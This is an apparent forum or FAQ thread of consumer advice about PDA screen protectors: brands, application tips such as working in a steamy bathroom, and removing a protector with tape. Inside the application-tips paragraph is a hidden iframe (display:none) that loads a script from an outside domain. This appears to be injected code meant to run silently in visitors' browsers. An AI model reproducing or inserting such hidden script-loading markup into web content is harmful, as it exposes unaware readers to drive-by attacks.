Are there any screen protectors I can use with my phone?

There are a few different brands of screen protectors available. You can find them at your local computer retail store (CompUSA, Best Buy, Circuit City, Fry's, etc.) or online. One of the most common brands found in these stores is Fellowes WriteRIGHT. These are a soft shield that are inexpensive, but have a limited lifespan. The WriteRIGHT size that fits the Phone Edition is the Jordana or Maestro version (if they do not have them labeled for the Phone Edition). Personally, I prefer the hard shields... they are much more expensive, but they are nearly invisible, are easy to write on, and last a long time.

These brands are very good and come specifically sized for the Phone Edition:

    Tips

The key to using screen protectors is in how you apply them. It requires a steady hand and an even applicator. Go slowly and press firmly to avoid bubbles and lines if using the soft protectors. In all cases, make sure that the screen is perfectly clean (along with your hands) before attempting to apply. PocketPC Techs suggests that you do it in the bathroom with a hot shower running. This removes all of the static electricity that can attract dust. This is especially important when using the hard protectors such as the WriteShield.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

WriteShield Screen Protectors are highly reccommended.

How do I reomve a write shield?

Is it possible to remove a screen protector. I placed a write shield on my Tungsten (first ed) when I first bought it and now I want to replace it. How do I do that?

    Please help. Thanks.

Use a piece of scotch tape (office tape), hold onto half of it, then firmly adhere the other half onto a corner edge of your ClearTouch. Once the scotch tape has been firmly applied onto ClearTouch, peel back the tape to lift the ClearTouch edge off your screen. That's all there it to it! Now you're ready to realign it again!

OK, I believe someone mentioned the "hard shield screen protectors". I have been using the soft. What are the major benefits to the hard? Also, can these be bought in stores like the soft ones?

I have a T-Mobile Pocket PC Phone Edition and would need one to fit that.

    Thanks,
    Cass
